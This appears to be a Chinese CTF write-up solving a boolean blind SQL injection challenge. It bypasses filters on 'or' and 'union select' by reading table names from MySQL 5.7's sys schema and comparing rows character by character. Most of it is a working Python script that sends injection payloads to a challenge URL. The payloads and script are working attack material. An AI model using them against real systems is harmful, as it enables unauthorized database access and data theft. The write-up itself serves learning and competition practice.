测试出注入点
2-(ascii(substr(database(),1,1))>1)
由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:
#encoding=utf-8 import requests def str_to_hex(s): return ''.join([hex(ord(c)).replace('0x', '') for c in s]) database = "" url = 'http://66e367cd334d4fa788462962dc906f83ee74f3366aea4d1b.changame.ichunqiu.com/' flag = '' for i in range(1, 63): for j in range(33, 128): hex_str = str_to_hex(flag + chr(j)) payload = {"id": "2-(select (select 1,0x" + hex_str + ")>(select * from f1ag_1s_h3r3_hhhhh limit 1))"} r = requests.post(url=url, data=payload) # print payload # print r.text if "Nu1L" in r.text: flag += chr(j-1) print(flag) break # 获得库名 # for i in range(1, 33): # # for j in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.': # # payload = {"id": "2-(ascii(substr(database()," + str(i) + ",1))=" + str(ord(j)) + ")"} # # r = requests.post(url=url, data=payload) # # #print payload # # #print r.text # # if "Nu1L" in r.text: # # database += j # # print(database) # # # 获得表名 # for i in range(23, 60): # for j in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.': # payload = {"id": "2-(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database())," + str(i) + ",1))=" + str(ord(j)) + ")"} # r = requests.post(url=url, data=payload) # #print payload # #print r.text # if "Nu1L" in r.text: # database += j # print(database)